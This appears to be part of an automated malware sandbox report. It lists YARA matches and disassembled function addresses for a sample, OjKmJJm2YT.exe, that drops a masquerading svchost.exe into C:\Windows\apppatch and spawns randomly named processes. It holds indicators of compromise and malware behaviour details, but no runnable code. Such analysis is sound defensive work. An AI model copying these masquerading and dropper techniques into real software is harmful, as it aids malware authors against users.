Source: Yara matchFile source: 2.3.svchost.exe.883000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000002.00000003.1339491124.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara matchFile source: 00000002.00000003.1339398735.0000000000883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.1328359395.000000000083B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: OjKmJJm2YT.exe PID: 1956, type: MEMORYSTR
Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1512, type: MEMORYSTR
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB79E0 NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,_snprintf,memset,_snprintf,OpenMutexA,2_2_02BB79E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB3A20 VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,2_2_02BB3A20
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00693A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,5_2_00693A20
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D3A20 LdrInitializeThunk,VirtualQuery,VirtualAlloc,SymSetOptions,GetCurrentProcess,GetCurrentProcess,SymInitialize,GetCurrentProcess,GetLastError,_snprintf,GetCurrentThread,ZwQueryInformationThread,GetCurrentProcess,GetCurrentProcess,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,GetDateFormatA,GetTimeFormatA,_snprintf,PathAddBackslashA,PathAddBackslashA,PathAddBackslashA,VirtualFree,6_2_014D3A20
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004021D0: CreateFileA,DeviceIoControl,CloseHandle,0_2_004021D0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004018E0 _snprintf,memset,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,MultiByteToWideChar,GetProcessHeap,HeapAlloc,memset,MultiByteToWideChar,GetProcessHeap,CreateProcessWithLogonW,GetProcessHeap,HeapValidate,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,0_2_004018E0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile created: C:\Windows\apppatch\svchost.exeJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeFile created: C:\Windows\apppatch\svchost.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0043C0D00_2_0043C0D0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004460F00_2_004460F0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004408800_2_00440880
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044A8A00_2_0044A8A0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004239700_2_00423970
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00445A200_2_00445A20
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0043CA300_2_0043CA30
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004423400_2_00442340
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0042EB800_2_0042EB80
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00443C000_2_00443C00
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0043CC100_2_0043CC10
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0043AC300_2_0043AC30
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0040ED300_2_0040ED30
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0043A6500_2_0043A650
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0044E6130_2_0044E613
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004356D00_2_004356D0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004416D00_2_004416D0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00447EDD0_2_00447EDD
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_0040EF500_2_0040EF50
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004467C00_2_004467C0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004147E00_2_004147E0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_004447900_2_00444790
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00408FA00_2_00408FA0
Source: C:\Users\user\Desktop\OjKmJJm2YT.exeCode function: 0_2_00442FA00_2_00442FA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043C0D02_2_0043C0D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004460F02_2_004460F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004408802_2_00440880
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044A8A02_2_0044A8A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004239702_2_00423970
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00445A202_2_00445A20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043CA302_2_0043CA30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004423402_2_00442340
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0042EB802_2_0042EB80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00443C002_2_00443C00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043CC102_2_0043CC10
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043AC302_2_0043AC30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040ED302_2_0040ED30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0043A6502_2_0043A650
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0044E6132_2_0044E613
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004416D02_2_004416D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00447EDD2_2_00447EDD
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0040EF502_2_0040EF50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004467C02_2_004467C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004147E02_2_004147E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_004447902_2_00444790
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00408FA02_2_00408FA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00442FA02_2_00442FA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDF2D02_2_02BDF2D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEB2D02_2_02BEB2D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF82132_2_02BF8213
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE42502_2_02BE4250
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB2BA02_2_02BB2BA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BECBA02_2_02BECBA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEE3902_2_02BEE390
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BBE3E02_2_02BBE3E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF03C02_2_02BF03C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB8B502_2_02BB8B50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE48302_2_02BE4830
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE68102_2_02BE6810
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BED8002_2_02BED800
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BB89302_2_02BB8930
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE66302_2_02BE6630
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEF6202_2_02BEF620
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BD87802_2_02BD8780
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF17802_2_02BF1780
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEBF402_2_02BEBF40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BF44A02_2_02BF44A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEA4802_2_02BEA480
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BEFCF02_2_02BEFCF0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BE5CD02_2_02BE5CD0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BCD5702_2_02BCD570
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A40A202_2_02A40A20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A37A302_2_02A37A30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A29B802_2_02A29B80
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3D3402_2_02A3D340
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A458A02_2_02A458A0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3B8802_2_02A3B880
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A410F02_2_02A410F0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A370D02_2_02A370D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A1E9702_2_02A1E970
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3C6D02_2_02A3C6D0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A42EDD2_2_02A42EDD
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A356502_2_02A35650
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A03FA02_2_02A03FA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3DFA02_2_02A3DFA0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3F7902_2_02A3F790
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A0F7E02_2_02A0F7E0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A417C02_2_02A417C0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A09F502_2_02A09F50
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A35C302_2_02A35C30
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A3EC002_2_02A3EC00
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A37C102_2_02A37C10
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A09D302_2_02A09D30
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006C48305_2_006C4830
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CD8005_2_006CD800
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006C68105_2_006C6810
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006989305_2_00698930
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006C42505_2_006C4250
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006D82135_2_006D8213
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006BF2D05_2_006BF2D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CB2D05_2_006CB2D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00698B505_2_00698B50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0069E3E05_2_0069E3E0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006D03C05_2_006D03C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00692BA05_2_00692BA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CCBA05_2_006CCBA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CE3905_2_006CE390
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CFCF05_2_006CFCF0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006C5CD05_2_006C5CD0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006D44A05_2_006D44A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CA4805_2_006CA480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006AD5705_2_006AD570
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CF6205_2_006CF620
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006C66305_2_006C6630
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006CBF405_2_006CBF40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006B87805_2_006B8780
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006D17805_2_006D1780
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006710F05_2_006710F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006670D05_2_006670D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006758A05_2_006758A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0066B8805_2_0066B880
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0064E9705_2_0064E970
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00670A205_2_00670A20
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00667A305_2_00667A30
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0066D3405_2_0066D340
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00659B805_2_00659B80
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00665C305_2_00665C30
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0066EC005_2_0066EC00
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00667C105_2_00667C10
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00639D305_2_00639D30
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006656505_2_00665650
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006796135_2_00679613
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006606D05_2_006606D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0066C6D05_2_0066C6D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00672EDD5_2_00672EDD
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00639F505_2_00639F50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0063F7E05_2_0063F7E0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_006717C05_2_006717C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_00633FA05_2_00633FA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0066DFA05_2_0066DFA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 5_2_0066F7905_2_0066F790
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D89306_2_014D8930
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015068106_2_01506810
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150D8006_2_0150D800
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015048306_2_01504830
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D8B506_2_014D8B50
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015103C06_2_015103C0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014DE3E06_2_014DE3E0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150E3906_2_0150E390
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014D2BA06_2_014D2BA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150CBA06_2_0150CBA0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015042506_2_01504250
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015182136_2_01518213
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150B2D06_2_0150B2D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014FF2D06_2_014FF2D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014ED5706_2_014ED570
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01505CD06_2_01505CD0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150FCF06_2_0150FCF0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150A4806_2_0150A480
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015144A06_2_015144A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150BF406_2_0150BF40
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014F87806_2_014F8780
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015117806_2_01511780
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_015066306_2_01506630
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0150F6206_2_0150F620
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_0148E9706_2_0148E970
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014A70D06_2_014A70D0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014B10F06_2_014B10F0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014AB8806_2_014AB880
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014B58A06_2_014B58A0
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014AD3406_2_014AD340
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01499B806_2_01499B80
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014B0A206_2_014B0A20
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_014A7A306_2_014A7A30
Source: C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exeCode function: 6_2_01479D306_2_01479D30
